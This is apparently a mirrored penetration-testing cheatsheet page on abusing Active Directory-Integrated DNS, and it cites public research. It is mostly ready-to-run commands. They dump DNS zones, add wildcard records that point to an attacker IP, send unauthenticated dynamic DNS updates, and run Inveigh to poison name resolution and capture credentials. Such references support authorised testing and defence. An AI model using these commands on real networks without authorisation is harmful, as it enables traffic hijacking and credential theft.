daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-integrated-dns.md (3397B)


      1 ---
      2 title: "Active Directory - Integrated DNS - ADIDNS"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-integrated-dns.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-integrated-dns.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Integrated DNS - ADIDNS
     12 
     13 ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol.
     14 
     15 ## LDAP-Based (Require authentication)
     16 
     17 * Enumerate all records
     18 
     19     ```ps1
     20     adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp)
     21     # or
     22     bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 get dnsDump
     23     ```
     24 
     25 * Query a node
     26 
     27     ```ps1
     28     dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy)
     29     # or
     30     bloodyAD -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'DC=DomainDnsZones,DC=bloody,DC=lab' --filter '(&(name=allmightyDC)(objectClass=dnsNode))' --attr dnsRecord
     31     ```
     32 
     33 * Add a node and attach a record
     34 
     35     ```ps1
     36     dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController
     37     # or
     38     bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 add dnsRecord dc1.example.lab <Attacker IP>
     39 
     40     bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 remove dnsRecord dc1.example.lab <Attacker IP>
     41     ```
     42 
     43 The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network.
     44 
     45 ```ps1
     46 Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y
     47 ```
     48 
     49 ## Dynamic Updates (Doesn't require authentication)
     50 
     51 Dynamic DNS (RFC 2136) allows using the DNS protocol to update DNS records:
     52 
     53 1. If the zone is set to Secure Only, you need a valid Kerberos ticket.
     54 
     55 2. If the zone is set to Nonsecure and Secure, anyone on the network can send updates.
     56 
     57 Update a record:
     58 
     59 ```ps1
     60 # Linux
     61 cat << EOF > dnsupdate.txt
     62 server dc.domain.corp
     63 zone domain.corp
     64 update delete test.domain.corp A
     65 update add test.domain.corp 3600 A 10.10.10.123
     66 send
     67 EOF
     68 
     69 nsupdate dnsupdate.txt
     70 
     71 # Windows
     72 Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.125.100 -Verbose
     73 ```
     74 
     75 ## DNS Reconnaissance
     76 
     77 Perform **ADIDNS** searches
     78 
     79 ```powershell
     80 StandIn.exe --dns --limit 20
     81 StandIn.exe --dns --filter SQL --limit 10
     82 StandIn.exe --dns --forest --domain <domain> --user <username> --pass <password>
     83 StandIn.exe --dns --legacy --domain <domain> --user <username> --pass <password>
     84 ```
     85 
     86 ## References
     87 
     88 * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
     89 * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/)
     90 * [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/)